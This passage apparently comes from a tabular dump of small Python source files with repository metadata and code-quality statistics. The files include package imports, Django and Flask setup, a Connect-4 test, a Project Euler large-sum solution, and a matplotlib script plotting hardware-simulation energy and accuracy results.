| 28.5 | 52 | 0.789474 | 33 | 228 | 5.333333 | 0.69697 | 0.136364 | 0.193182 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.100877 | 228 | 7 | 53 | 32.571429 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0.02193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7e3fea706fb97f9afcb328081840fc3db9d6f45a | 30 | py | Python | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 8 | 2021-12-20T14:57:34.000Z | 2022-01-14T01:24:45.000Z | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 21 | 2021-12-20T09:55:57.000Z | 2022-03-07T08:48:37.000Z | verificac19/service/__init__.py | VC19-SDK/pyverificac19 | a6c5550b3445b147577e9a0cc7f21a8151989870 | [
"MIT"
] | 2 | 2022-01-04T21:23:01.000Z | 2022-02-04T10:32:54.000Z | from .service import _service
| 15 | 29 | 0.833333 | 4 | 30 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e5142afcfc430c799c9afce864e0c94f271c5b6 | 196 | py | Python | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 385 | 2019-10-21T14:36:08.000Z | 2022-03-31T16:35:53.000Z | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 115 | 2019-10-19T02:41:58.000Z | 2022-03-04T23:00:41.000Z | online-event-resources/web-development/django102/presentations/admin.py | aindrila2412/Reactors | 6efd59e53dc9026ae68dcbc814945d12a5a41071 | [
"MIT"
] | 303 | 2019-10-18T07:27:40.000Z | 2022-03-29T12:44:01.000Z | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.Presentation)
admin.site.register(models.Speaker)
admin.site.register(models.Track)
| 21.777778 | 40 | 0.811224 | 27 | 196 | 5.888889 | 0.481481 | 0.169811 | 0.320755 | 0.433962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 196 | 8 | 41 | 24.5 | 0.893258 | 0.132653 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0e63d7f59aa0685ad20e3a0e7a10fada13fde183 | 46 | py | Python | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | 1 | 2022-02-02T08:30:29.000Z | 2022-02-02T08:30:29.000Z | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | null | null | null | src/press_start/pipelines/feature_selection/__init__.py | luizvbo/press-start | 02590c2176a4ae53287fe5a9b5c6a1ecd30bcdb6 | [
"BSD-3-Clause"
] | null | null | null | from .pipeline import create_pipeline # NOQA
| 23 | 45 | 0.804348 | 6 | 46 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 1 | 46 | 46 | 0.923077 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e9e456f095e2315688e0d1cd6e1835a2e55ec1a | 157 | py | Python | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | app/api_1_0/__init__.py | Zoctan/flask-api-seed | eef9e63415a563e31e256fc7380edb7c6b12a3ab | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Blueprint
api = Blueprint('api_1_0', __name__)
from . import authentication, user, error
| 17.444444 | 41 | 0.700637 | 22 | 157 | 4.727273 | 0.818182 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030075 | 0.152866 | 157 | 8 | 42 | 19.625 | 0.75188 | 0.273885 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
7ee129242ccabb9bd6b87a61196c01e10c37bd0d | 36 | py | Python | doctorbot/hospital_crawler/views/__init__.py | zuxfoucault/DoctorBot_demo | 82e24078da4d2e6caba728b959812401109e014d | [
"MIT"
] | 1 | 2020-09-24T07:26:14.000Z | 2020-09-24T07:26:14.000Z | doctorbot/hospital_crawler/views/__init__.py | lintzuhsiang/Doctorbot | 6be98bbf380d14bb789d30a137ded3b51b3f31fd | [
"MIT"
] | null | null | null | doctorbot/hospital_crawler/views/__init__.py | lintzuhsiang/Doctorbot | 6be98bbf380d14bb789d30a137ded3b51b3f31fd | [
"MIT"
] | null | null | null | from .movie_view import MovieDetail
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
70e643f2c110657bc05fe9afce7b576fa78ac4f1 | 61 | py | Python | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | digit/data_load/__init__.py | ResMarkus/SHOT | 02bef3ec376ea360f03933bd9f6d6b496815fb48 | [
"MIT"
] | null | null | null | from .mnist import *
from .svhn import *
from .usps import *
| 15.25 | 20 | 0.704918 | 9 | 61 | 4.777778 | 0.555556 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 3 | 21 | 20.333333 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cb12539a3c59878c87d69ff9cbb6ed45cd542f1c | 243 | py | Python | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | 2 | 2022-01-20T06:16:00.000Z | 2022-01-20T07:30:26.000Z | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | null | null | null | data/lib/customOS/__init__.py | Synell/PERT-Maker | 8eac93eaa788ee0a201437e5bd30d55133d7cd38 | [
"MIT"
] | null | null | null | #----------------------------------------------------------------------
# Libraries
from .get import *
from .encoding import *
from .stringExtension import *
#----------------------------------------------------------------------
| 30.375 | 73 | 0.26749 | 11 | 243 | 6 | 0.636364 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115226 | 243 | 7 | 74 | 34.714286 | 0.302326 | 0.617284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cb1e0a9624230e75482ae64be567028b3ad23a41 | 327 | py | Python | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_next_player.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | from agents.common import PLAYER1, PLAYER2, NO_PLAYER, next_player
def test_next_player_expectedPLAYER1():
assert next_player(PLAYER2) == PLAYER1
def test_next_player_expectedPLAYER2():
assert next_player(PLAYER1) == PLAYER2
def test_next_player_expectedNOPLAYER():
assert next_player(NO_PLAYER) == NO_PLAYER
| 23.357143 | 66 | 0.792049 | 42 | 327 | 5.785714 | 0.357143 | 0.288066 | 0.135802 | 0.209877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.131498 | 327 | 13 | 67 | 25.153846 | 0.827465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.428571 | true | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
cb8770c793e24d90bf0fb8e3e253a244574d3a78 | 6,272 | py | Python | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | euler/13:Large_sum.py | Alexdelia/Puzzle_Solving | 620e07508cd36dba7b806040c36360b87eb4637e | [
"CC0-1.0"
] | null | null | null | # **************************************************************************** #
# #
# ::: :::::::: #
# 13:Large_sum.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: adelille <adelille@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2021/09/23 20:48:56 by adelille #+# #+# #
# Updated: 2021/09/23 20:54:25 by adelille ### ########.fr #
# #
# **************************************************************************** #
# I love C, but Fuck C in this particular situation
# I don't want to store the 100, 50 digits numbers in string
# and then add them while increasing when it goes over 10 in each char
numbers = """37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690"""
numbers = [int(i) for i in numbers.split("\n")]
print(str(sum(numbers))[:10])
| 52.266667 | 80 | 0.845344 | 181 | 6,272 | 29.287293 | 0.872928 | 0.005659 | 0.003018 | 0.003773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.900661 | 0.107621 | 6,272 | 119 | 81 | 52.705882 | 0.046453 | 0.161352 | 0 | 0 | 0 | 0 | 0.978891 | 0.959509 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.009804 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cbac952b1ce9f7dc2df3b3ff6e80160492f86c5c | 82 | py | Python | hrv/sampledata/__init__.py | rhenanbartels/hrv | 3f813f6727ff693daccf2fd1a939a30a966f56e1 | [
"BSD-3-Clause"
] | 157 | 2016-10-21T00:41:25.000Z | 2022-03-29T01:53:30.000Z | hrv/sampledata/__init__.py | nickzhuang0613/hrv | 190c923250884b1f5632e38658bd8df7d9d5352e | [
"BSD-3-Clause"
] | 23 | 2017-03-26T19:45:21.000Z | 2021-12-16T06:54:08.000Z | hrv/sampledata/__init__.py | nickzhuang0613/hrv | 190c923250884b1f5632e38658bd8df7d9d5352e | [
"BSD-3-Clause"
] | 50 | 2016-10-21T00:23:35.000Z | 2022-03-08T12:01:57.000Z | from hrv.sampledata._load import load_rest_rri, load_exercise_rri, load_noisy_rri
| 41 | 81 | 0.878049 | 14 | 82 | 4.642857 | 0.642857 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 82 | 1 | 82 | 82 | 0.855263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cbb297179d0f24e5414590bc1d5c6cbbdcb5406e | 8,355 | py | Python | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | 2 | 2020-11-08T12:51:23.000Z | 2021-12-02T23:16:48.000Z |
import numpy as np
np.set_printoptions(precision=2, suppress=True)
import matplotlib.pyplot as plt
####################
def merge_dicts(list_of_dicts):
results = {}
for d in list_of_dicts:
for key in d.keys():
if key in results.keys():
results[key].append(d[key])
else:
results[key] = [d[key]]
return results
####################
comp_pJ = 22. * 1e-12 / 32. / 16.
num_layers = 6
num_comparator = 8
results = np.load('results.npy', allow_pickle=True).item()
x = np.array([0.06, 0.08, 0.10, 0.12, 0.14, 0.16, 0.18, 0.20])
y_mean = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_std = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac_per_cycle = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac_per_pJ = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_cycle = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_ron = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_roff = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_adc = np.zeros(shape=(2, 2, 2, len(x), num_layers, num_comparator))
y_energy = np.zeros(shape=(2, 2, 2, len(x), num_layers))
####################
for key in sorted(results.keys()):
(skip, cards, alloc, profile, narray, sigma, rpr) = key
layer_results = results[key]
if rpr == 'dynamic':
rpr = 0
elif rpr == 'centroids':
rpr = 1
else:
assert (False)
for layer in range(num_layers):
example_results = merge_dicts(layer_results[layer])
sigma_index = np.where(x == sigma)[0][0]
y_mean[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['mean'])
y_std[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['std'])
y_mac_per_cycle[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['nmac']) / np.sum(example_results['cycle'])
y_mac[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['nmac'])
y_cycle[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['cycle'])
y_ron[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['ron'])
y_roff[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['roff'])
y_adc[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['adc'], axis=0)
y_energy[skip][cards][rpr][sigma_index][layer] += y_ron[skip][cards][rpr][sigma_index][layer] * 2e-16
y_energy[skip][cards][rpr][sigma_index][layer] += y_roff[skip][cards][rpr][sigma_index][layer] * 2e-16
y_energy[skip][cards][rpr][sigma_index][layer] += np.sum(y_adc[skip][cards][rpr][sigma_index][layer] * np.array([1,2,3,4,5,6,7,8]) * comp_pJ)
y_mac_per_pJ[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['nmac']) / 1e12 / np.sum(y_energy[skip][cards][rpr][sigma_index][layer])
####################
plot_layer = 0
####################
TOPs_skip = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 0, 0, :, :], axis=1) / 1e12
TOPs_cards = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 1, 0, :, :], axis=1) / 1e12
TOPs_centroids = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 1, 1, :, :], axis=1) / 1e12
####################
MAC_pJ_skip = np.sum(y_mac[1, 0, 0, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 0, 0, :, :], axis=1)
MAC_pJ_cards = np.sum(y_mac[1, 1, 0, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 1, 0, :, :], axis=1)
MAC_pJ_centroids = np.sum(y_mac[1, 1, 1, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 1, 1, :, :], axis=1)
####################
plt.cla()
ax = plt.gca()
# plt.plot(x, y_mac_per_cycle[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, TOPs_skip, color='green', marker="D", markersize=5, label='skip')
plt.plot(x, TOPs_cards, color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, TOPs_centroids, color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.xlabel('Variance')
plt.ylabel('TOPs')
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('TOPs.png', dpi=300)
plt.cla()
ax = plt.gca()
# plt.plot(x, y_mac_per_pJ[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, MAC_pJ_skip, color='green', marker="D", markersize=5, label='skip')
plt.plot(x, MAC_pJ_cards, color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, MAC_pJ_centroids, color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
plt.xlabel('Variance')
plt.ylabel('MAC / pJ')
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('mac_per_pJ.png', dpi=300)
plt.cla()
ax = plt.gca()
# plt.plot(x, y_std[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
# plt.plot(x, y_std[1, 0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='skip')
# plt.plot(x, y_std[1, 1, 0, :, plot_layer], color='blue', marker="s", markersize=6, label='cards')
# plt.plot(x, y_std[1, 1, 1, :, plot_layer], color='black', marker="^", markersize=6, label='k-means')
plt.plot(x, np.mean(y_std[1, 0, 0, :, :], axis=1), color='green', marker="D", markersize=5, label='skip')
plt.plot(x, np.mean(y_std[1, 1, 0, :, :], axis=1), color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, np.mean(y_std[1, 1, 1, :, :], axis=1), color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0, top=1)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
plt.xlabel('Variance')
plt.ylabel('Mean Squared Error')
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('mse.png', dpi=300)
'''
plt.cla()
ax = plt.gca()
plt.plot(x, acc[0, 0, :], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, acc[1, 0, :], color='blue', marker="s", markersize=5, label='skip')
plt.plot(x, acc[1, 1, :], color='black', marker="^", markersize=6, label='cards')
plt.ylim(bottom=0, top=1)
plt.xticks([0.08, 0.12])
# plt.yticks([])
ax.axes.xaxis.set_ticklabels([])
ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
fig.set_size_inches(4., 2.5)
plt.tight_layout()
fig.savefig('acc.png', dpi=300)
'''
####################
# print (y_std[1, 0, :, :])
# print ('------')
# print (y_std[1, 1, :, :])
'''
print ('mac / pJ')
print (np.around(y_mac_per_pJ[1, 1, 1, :, plot_layer] / y_mac_per_pJ[1, 0, 0, :, plot_layer], 3))
print ('mac / cycle')
print (np.around(y_mac_per_cycle[1, 1, 1, :, plot_layer] / y_mac_per_cycle[1, 0, 0, :, plot_layer], 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 0, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(y_mac_per_pJ[1, 1, 1, :, plot_layer] / y_mac_per_pJ[1, 1, 0, :, plot_layer], 3))
print ('mac / cycle')
print (np.around(y_mac_per_cycle[1, 1, 1, :, plot_layer] / y_mac_per_cycle[1, 1, 0, :, plot_layer], 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 1, 0, :, :], 2))
'''
####################
print ('mac / pJ')
print (np.around(MAC_pJ_centroids / MAC_pJ_cards, 3))
print ('mac / cycle')
print (np.around(TOPs_centroids / TOPs_cards, 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 1, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(MAC_pJ_centroids / MAC_pJ_skip, 3))
print ('mac / cycle')
print (np.around(TOPs_centroids / TOPs_skip, 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 0, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(MAC_pJ_cards / MAC_pJ_skip, 3))
print ('mac / cycle')
print (np.around(TOPs_cards / TOPs_skip, 3))
print ('mse')
print (np.around(y_std[1, 1, 0, :, :] / y_std[1, 0, 0, :, :], 2))
####################
| 32.011494 | 156 | 0.604548 | 1,401 | 8,355 | 3.444682 | 0.102784 | 0.015748 | 0.029838 | 0.056361 | 0.816826 | 0.782843 | 0.769374 | 0.752383 | 0.73104 | 0.682967 | 0 | 0.046855 | 0.141712 | 8,355 | 260 | 157 | 32.134615 | 0.626133 | 0.129743 | 0 | 0.346774 | 0 | 0 | 0.067997 | 0 | 0 | 0 | 0 | 0 | 0.008065 | 1 | 0.008065 | false | 0 | 0.016129 | 0 | 0.032258 | 0.201613 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cbb5b84b889431f65a5d604bca4e6cc33615f3a6 | 42 | py | Python | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
